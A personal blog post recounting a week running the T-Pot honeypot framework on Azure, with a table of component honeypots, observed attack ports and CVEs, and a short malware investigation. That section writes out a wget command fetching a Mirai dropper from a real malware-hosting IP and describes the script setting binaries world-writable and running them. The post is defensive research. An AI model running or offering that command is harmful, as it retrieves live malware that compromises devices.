September 24, 2021

A Week’s Progress on the T-Pot Honeypot

Last week I installed the TPot Honeypot framework on an Azure VM. (Click here!)

The amount of information and dashboards available has been overwhelming. The first thing to do, to make sense of it all, is to look at the dashboards and make a table of what is available and what that honeypot does. Without further ado, I present the table!

Honeypots Available

HoneypotRole
>TPotNot a Honeypot – A general dashboard for all the Honeypots.
AdbhoneyLow interaction honeypot designed for Android Debug Bridge over TCP/IP. The purpose of this project is to provide a low interaction honeypot designed to catch whatever malware is being pushed by attackers to unsuspecting victims which have port 5555 exposed.
CiscoasaA low interaction honeypot for the Cisco ASA component capable of detecting CVE-2018-0101, a DoS and remote code execution vulnerability.
CitrixHoneypotDetect and log CVE-2019-19781 scan and exploitation attempts.
ConpotConpot is a low interactive server side Industrial Control Systems honeypot.
CowrieCowrie is a medium to high interaction SSH and Telnet honeypot designed to log brute force attacks and the shell interaction performed by the attacker. In medium interaction mode (shell) it emulates a UNIX system in Python, in high interaction mode (proxy) it functions as an SSH and telnet proxy to observe attacker behavior to another system.
DicompotA Digital Imaging and Communications in Medicine (DICOM) Honeypot.
DionaeaDionaea intention is to trap malware exploiting vulnerabilities exposed by services offered to a network, the ultimate goal is gaining a copy of the malware.
ElasticPotThis is an elasticSearch Honeypot. It emulates GET PUT, POST, DELETE requests.
FattA script for extracting network metadata and fingerprints such as JA3 and HASSH from packet capture files (pcap) or live network traffic. The main use-case is for monitoring honeypots, but you can also use it for other use cases such as network forensic analysis. fatt works on Linux, macOS and Windows.
GluttonGeneric Low Interaction Honeypot
HeraldingSometimes you just want a simple honeypot that collects credentials, nothing more. Heralding is that honeypot! Currently the following protocols are supported: ftp, telnet, ssh, rdp, http, https, pop3, pop3s, imap, imaps, smtp, vnc, postgresql and socks5.
HoneypyA low interaction honeypot with the capability to be more of a medium interaction honeypot.
HoneysapHoneySAP is a low-interaction research-focused honeypot specific for SAP services. It’s aimed at learn the techniques and motivations behind attacks against SAP systems.
HoneytrapHoneytrap is an extensible and opensource system for running, monitoring and managing honeypots.
IpphoneyThis is a honeypot simulating a printer that supports the Internet Printing Protocol and is exposed to the Internet. It uses ideas from various other honeypots, like ADBHoneypot (for output plugin support), Citrix Honeypot (for general structure), and Elasticpot.
MailoneyAn SMTP Honeypot.
MedpotHL7 / FHIR honeypot.
NGINXNGINX Honeypot
RdpyRDP Honeypot.
SuricataSuricata is a free and open source, mature, fast and robust network threat detection engine.
The Suricata engine is capable of real time intrusion detection (IDS), inline intrusion prevention (IPS), network security monitoring (NSM) and offline pcap processing.
TannerTANNER is a remote data analysis and classification service to evaluate HTTP requests and composing the response then served by SNARE. TANNER uses multiple application vulnerability type emulation techniques when providing responses for SNARE. In addition, TANNER provides Dorks for SNARE powering its luring capabilities.

Initial Findings

I was surprised at how quickly attacks came in when the IP was exposed to the internet. It is clear there must be bots/scans constantly scanning cloud IP ranges – almost immediately when you expose an IP, you will get attacks. This underlines how important it is to secure your assets in the cloud before you open services for connectivity.

The Attacks by Destination Port shows that the vast majority of attacks are targeting Port 445. which is SMB. This is the service that so many exploits are famous for, from Eternal Blue/WannaCry (CVE-2017-0144) to the more recent SMBBleed/SMBGhost (CVE-2020-1206)

The other ports listed are 22 (SSH), 23 (Telnet), 8088 (Asterisk Management Port), 1433 (MS SQL Server). I noticed other attacks coming in to ports associated with the Hyper-V & ESET Management Consoles.

Attacks came in from all over the world, with the usual culprits listed. This information can be used to block ASNs/IP ranges belonging to those countries for your critical services. I suspect US is so high on the list because hackers are using US Cloud services to run attacks, or botnets.

There is a list of common CVEs. I was surprised to see such an old CVE come top of the list. CVE-2001-0540 is nearly 20 years old and causes a denial of service on Windows 2000 and NT servers exposing Port 3389 (RDP). I can only imagine attackers are trying to crash these servers to get rid of these useless low hanging fruit. More recent CVEs being exploited are vulnerabilities in Oracles Weblogic server, the MikroTik OS and RDP Vulns from 2019 and a few other vulns from 2020. You need to make sure you security solution is up to date as attackers don’t care that your patching schedule is only once a month.

There is also a section for Alert Signatures and by far is the DoublePulsar Backdoor install. This tool was helpfully written by the NSA and is now being used by other malicious actors to create a ‘landing pad’ on servers to deploy other malware.

Username and Password Tag Cloud

I started to generate a small username and password tag cloud. I think if I were to leave the honeypot running for longer, I would get some juicy lists.

A Small Investigation

In the ADBHoney dashboard, I noticed a command that looked interesting and wanted to check it out further.

The IP address seemed to be serving a file called wget.

A Shodan.io search shows this IP is a Russian one. URLHaus shows it is online and is a known IP associated with distributing malware.

I decided to download the file with wget http://5.252.194.137/wget

I could see that it loops through an array of binaries for each architecture that the android device could be running and makes it wold writeable, and then executes it with the parameter of ‘frank’.

So I decided to modify the script to download all the binaries and run md5sum on each so I would get the hash.

Now I submitted each hash to virustotal and discovered that it is a hash newly seen on VirusTotal two days prior to me writing this blog post. As suspected, the binaries are all variants of the Mirai trojan/botnet, which spreads over Ports 23 and 2323.

At this point I decided there was no further investigation needed!

Drawbacks

Administering the Honeypot became a bit of a chore over the week. I spent a lot of time trying to figure out why Azure Log Analytics wouldn’t install and report back, and it turns out that the agent is not supported on Debian 10.6. If I selected a Debian 9 VM and installed the agent, everything would be fine until I ran the install script for the Honeypot, which performed a distro upgrade to Debian 10.6, thus breaking the agent. I didn’t figure this out until I went through the manual install steps for the agent and then ran the troubleshooter, which can only be run from within the VM. To do this, run this command:

sudo /opt/microsoft/omsagent/bin/troubleshooter

The VM had a tendency to go offline multiple times a day which caused me to rebuild and redeploy, before just performing a restart of the VM to get it back online.

Conclusion

It has been a fun project to do for a week, and I can see a use case for it. It exposed areas of Azure where I am weak, and now I want to study towards the Azure Administrator exam to build on this experience. I think the next steps will be to implement Azure Runbooks to restart the VM when it goes into a critical state so I don’t have to manually intervene.

I would like to explore some of the more interesting honeypots in more detail now, especially now that I have created the table. I think the Cowrie honeypot looks very interesting as it allows an attacker to execute commands on a shell. I’d like to investigate that to see if I can perform a similar analysis to what I did for the adbhoneypot.